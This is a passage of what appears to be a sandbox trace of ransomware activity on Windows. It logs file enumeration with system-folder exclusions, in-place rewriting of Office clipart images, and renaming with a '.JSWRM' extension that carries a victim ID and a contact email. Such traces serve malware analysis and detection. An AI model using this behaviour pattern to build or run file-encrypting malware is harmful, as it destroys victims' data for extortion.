ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x211bb, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01046J.JPG", cAlternateFileName="")) returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2=".") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="..") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="...") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="windows") returned -1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="recovery") returned -1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="perflogs") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="documents and settings") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="system volume information") returned -1 [0093.627] lstrcmpiW (lpString1="PH01046J.JPG", lpString2="msocache") returned 1 [0093.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0093.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01046J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01046J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01046J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0093.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01046J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01046J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01046J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0093.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0093.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.666] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=135611) returned 1 [0093.666] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x211b0) returned 0x24d210 [0093.667] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x211b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x211b0, lpOverlapped=0x0) returned 1 [0093.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.679] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x211b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x211b0, lpOverlapped=0x0) returned 1 [0093.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.680] CloseHandle (hObject=0x314) returned 1 [0093.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0093.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0093.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0093.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0093.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0093.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0093.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0093.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0093.697] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa202, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01179J.JPG", cAlternateFileName="")) returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2=".") returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="..") returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="...") returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="windows") returned -1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="recovery") returned -1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="perflogs") returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="documents and settings") returned 1 [0093.697] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.698] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="system volume information") returned -1 [0093.698] lstrcmpiW (lpString1="PH01179J.JPG", lpString2="msocache") returned 1 [0093.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01179J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01179J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01179J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0093.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01179J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01179J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01179J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0093.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.710] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41474) returned 1 [0093.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa200) returned 0x24d210 [0093.711] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa200, lpOverlapped=0x0) returned 1 [0093.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.716] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa200, lpOverlapped=0x0) returned 1 [0093.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.717] CloseHandle (hObject=0x314) returned 1 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0093.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0093.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0093.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0093.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0093.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.718] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01213K.JPG", cAlternateFileName="")) returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2=".") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="..") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="...") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="windows") returned -1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="recovery") returned -1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="perflogs") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="documents and settings") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="system volume information") returned -1 [0093.718] lstrcmpiW (lpString1="PH01213K.JPG", lpString2="msocache") returned 1 [0093.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01213K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01213K.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01213K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0093.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01213K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01213K.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01213K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0093.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6334) returned 1 [0093.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18b0) returned 0x205850 [0093.720] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x18b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x18b0, lpOverlapped=0x0) returned 1 [0093.722] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.722] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x18b0, lpOverlapped=0x0) returned 1 [0093.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.722] CloseHandle (hObject=0x314) returned 1 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0093.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.722] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.723] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01221K.JPG", cAlternateFileName="")) returned 1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2=".") returned 1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="..") returned 1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="...") returned 1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="windows") returned -1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="recovery") returned -1 [0093.723] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="perflogs") returned 1 [0093.724] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="documents and settings") returned 1 [0093.724] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.724] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="system volume information") returned -1 [0093.724] lstrcmpiW (lpString1="PH01221K.JPG", lpString2="msocache") returned 1 [0093.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01221K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01221K.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01221K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01221K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 